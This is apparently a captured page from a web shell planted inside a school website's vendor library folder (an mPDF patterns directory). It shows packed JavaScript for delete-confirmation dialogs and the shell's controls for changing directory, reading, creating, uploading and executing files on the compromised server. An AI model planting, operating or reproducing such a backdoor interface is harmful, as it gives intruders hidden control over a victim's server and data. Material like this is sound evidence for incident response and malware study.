p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script></body></html>
Change dir:
/home/eschool/domains/kcw.ac.th/public_html/Admission/vendor/mpdf/mpdf/patterns/
Read file:
Make dir: [ Writeable ]
Make file: [ Writeable ]
Execute:
Upload file: [ Writeable ]
No file chosen
Function Calls
None |
Stats
MD5 | e242e4951b8bc4a1e1eda8b755f29e47 |
Eval Count | 0 |
Decode Time | 64 ms |